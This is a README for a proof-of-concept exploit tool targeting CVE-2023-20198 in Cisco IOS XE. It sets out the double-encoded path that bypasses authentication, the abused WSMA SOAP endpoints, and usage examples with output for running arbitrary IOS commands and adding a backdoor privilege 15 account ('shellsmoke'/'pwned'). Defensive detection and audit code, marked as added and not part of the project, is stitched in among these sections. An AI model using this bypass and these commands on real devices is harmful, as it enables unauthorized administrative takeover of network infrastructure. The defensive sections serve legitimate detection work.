
CVE-2023-20198

Exploit PoC for CVE-2023-20198

Description

CVE-2023-20198 is an improper path validation flaw: a crafted request bypasses the Nginx filtering in front of the IOS XE web UI and reaches the webui_wsma_http web endpoint without authentication.
Once the endpoint is reached without authentication, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with privilege level 15.
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS root user to facilitate implantation.

This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:
The vulnerability check, config, and command execution options all target the cisco:wsma-exec SOAP endpoint to insert commands into the execCLI element tag.
The add user option targets the cisco:wsma-config SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be used to make other configuration changes, but that's outside the scope of this PoC.
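The only network-visible trace of the bypass described above is the request path itself: the target URL shown later in this README (http://10.0.0.1/%2577eb%2575i_%2577sma_Http) is the endpoint name double percent-encoded, so a filter that decodes once sees something other than webui_wsma_http. The following detector, added here as an example and not part of this project's code, normalizes each request path by decoding until it stops changing and then flags requests that land on the WSMA endpoint. The access-log lines, the field layout and the function names are constructed for the example; adapt the regex to whatever log source sits in front of the device.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in a common combined-log layout.
# These are illustrative only, not taken from the README or any real device.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Oct/2023:10:01:12 +0000] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 512
10.0.0.5 - - [17/Oct/2023:10:01:13 +0000] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 7011
10.0.0.9 - - [17/Oct/2023:10:02:00 +0000] "GET /webui/ HTTP/1.1" 200 1024
10.0.0.9 - - [17/Oct/2023:10:02:05 +0000] "GET /webui/images/logo.png HTTP/1.1" 200 8192
10.0.0.7 - - [17/Oct/2023:10:03:00 +0000] "POST /webui_wsma_http HTTP/1.1" 403 0
"""

# Matches: source, timestamp, method, raw path and HTTP status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The endpoint name as it appears once all encoding layers are removed.
WSMA_ENDPOINT = "webui_wsma_http"


def normalize_path(path: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the string stops changing (bounded),
    then lowercase. A single decode turns %2577 into %77, not into 'w',
    which is exactly why a one-pass filter misses the bypass."""
    current = path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def is_wsma_request(path: str) -> bool:
    """True when the fully decoded path targets the WSMA endpoint."""
    normalized = normalize_path(path).split("?")[0].lstrip("/")
    return normalized.startswith(WSMA_ENDPOINT)


def find_suspicious_requests(log_text: str) -> list:
    """Return one record per request that reaches the WSMA endpoint,
    noting whether percent-encoding was used (the bypass signature)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if not is_wsma_request(path):
            continue
        hits.append({
            "src": m.group("src"),
            "ts": m.group("ts"),
            "raw_path": path,
            "normalized": normalize_path(path),
            "status": int(m.group("status")),
            "encoded_bypass": "%" in path,
        })
    return hits


def likely_successful_sources(hits: list) -> set:
    """Sources whose encoded request got a 2xx: the filter was bypassed and
    the endpoint answered. A plain, unencoded request with a 403 means the
    filter did its job and is reported but not counted here."""
    return {h["src"] for h in hits
            if h["encoded_bypass"] and 200 <= h["status"] < 300}


if __name__ == "__main__":
    found = find_suspicious_requests(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["src"]} {h["raw_path"]} -> {h["normalized"]} '
              f'status={h["status"]} encoded={h["encoded_bypass"]}')
    print("likely successful bypass from:", likely_successful_sources(found))
```

On the constructed sample this reports three requests to the endpoint: two double-encoded ones that received a 200 from 10.0.0.5 (the pattern to escalate) and one unencoded attempt that the filter rejected with a 403. Decoding in a bounded loop rather than once is the whole point; a detector that calls unquote a single time sees `%77eb%75i_%77sma_Http` and matches nothing.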

Abuse of the cisco:wsma-exec SOAP endpoint came from the nuclei template
Abuse of the cisco:wsma-config SOAP endpoint came from the horizon3ai PoC

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

Usage

usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity

Vulnerability check

To check for CVE-2023-20198, the -c option attempts to exploit the vulnerability to execute uname -a.
Example:

# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

Get Cisco Config

The -g option executes sh run to pull the running config.
Example:

# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...

Execute commands

Arbitrary Cisco IOS commands can be executed with the -e option.
Extreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.
Example:

# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...

Add user

The -a option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with -u and -p respectively.
Example:

# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.

Del user

The -d option can be used to remove a user account from the device, and respects the username specified with -u.
Caution should be used to make sure you aren't deleting a legitimate account.
This was added for instances where shell/webui access to an exploited Cisco device cannot be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could leave exploitation artifacts on hosts.
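The add-user and delete-user options above both leave their trace in the running configuration as a `username ... privilege 15` line, which is also the artifact a defender looks for after a suspected intrusion. The audit below, added here as an example and not part of this project's code, parses a running config pulled with sh run, lists local users with their privilege level, flags any privilege 15 account that is not on an expected list, and reports whether the HTTP server feature is still enabled (the Cisco advisory referenced below recommended disabling it on exposed systems). The config text, the hostname and the user names are constructed for the example; `expected_admins` is a parameter you supply from your own records.

```python
import re

# Constructed running-config excerpt in the style of the sh run output shown
# above. The secrets are placeholders, not real hashes.
CONSTRUCTED_RUNNING_CONFIG = """\
Building configuration...
Current configuration : 1234 bytes
!
version 16.6
hostname SW-LAB-01
!
username netadmin privilege 15 secret 9 $9$placeholder
username monitor secret 9 $9$placeholder
username shellsmoke privilege 15 secret 5 $1$placeholder
!
ip http server
ip http secure-server
!
end
"""

# A username line may or may not carry an explicit privilege keyword;
# IOS defaults the level to 1 when it is absent.
USERNAME_RE = re.compile(r"^username (?P<name>\S+)(?: privilege (?P<priv>\d+))?")

# Config lines that keep the web UI reachable over HTTP/HTTPS.
HTTP_SERVER_LINES = ("ip http server", "ip http secure-server")


def parse_local_users(config: str) -> dict:
    """Map each local username to its privilege level (default 1)."""
    users = {}
    for line in config.splitlines():
        m = USERNAME_RE.match(line.strip())
        if m:
            users[m.group("name")] = int(m.group("priv") or 1)
    return users


def audit_privilege15_users(config: str, expected_admins: set) -> set:
    """Privilege 15 accounts present in the config but not in the expected
    set. Each one is either an undocumented admin or an artifact to examine."""
    users = parse_local_users(config)
    return {name for name, priv in users.items()
            if priv == 15 and name not in expected_admins}


def http_server_enabled(config: str) -> set:
    """Which HTTP server feature lines are active in the config."""
    active = {line.strip() for line in config.splitlines()}
    return {l for l in HTTP_SERVER_LINES if l in active}


def audit_report(config: str, expected_admins: set) -> dict:
    """Single summary a responder can diff between devices or over time."""
    return {
        "users": parse_local_users(config),
        "unexpected_priv15": audit_privilege15_users(config, expected_admins),
        "http_server": http_server_enabled(config),
    }


if __name__ == "__main__":
    report = audit_report(CONSTRUCTED_RUNNING_CONFIG, expected_admins={"netadmin"})
    for name, priv in report["users"].items():
        print(f"user {name:<12} privilege {priv}")
    print("unexpected privilege 15 accounts:", report["unexpected_priv15"])
    print("HTTP server lines still enabled:", report["http_server"])
```

Run against the constructed config this flags shellsmoke as an unexpected privilege 15 account and reports that both HTTP server lines are still present. Because removing the account with -d erases the username line, keep a dated copy of the running config before any cleanup so the artifact survives for the investigation.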

References

Cisco Advisory
horizon3ai CVE-2023-20198 research
horizon3ai CVE-2023-20198 PoC
nuclei CVE-2023-20198 template (Authors: iamnoooob, rootxharsh, pdresearch)
LeakIX CVE-2023-20273 PoC

TODO

  • https support
  • CVE-2023-20273 Implementation
  • Timeout and error handling

Disclaimer

The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.
The author of this project is not responsible or liable for misuse of the software.
Use responsibly and don't be evil

Contributors

smokeintheshell
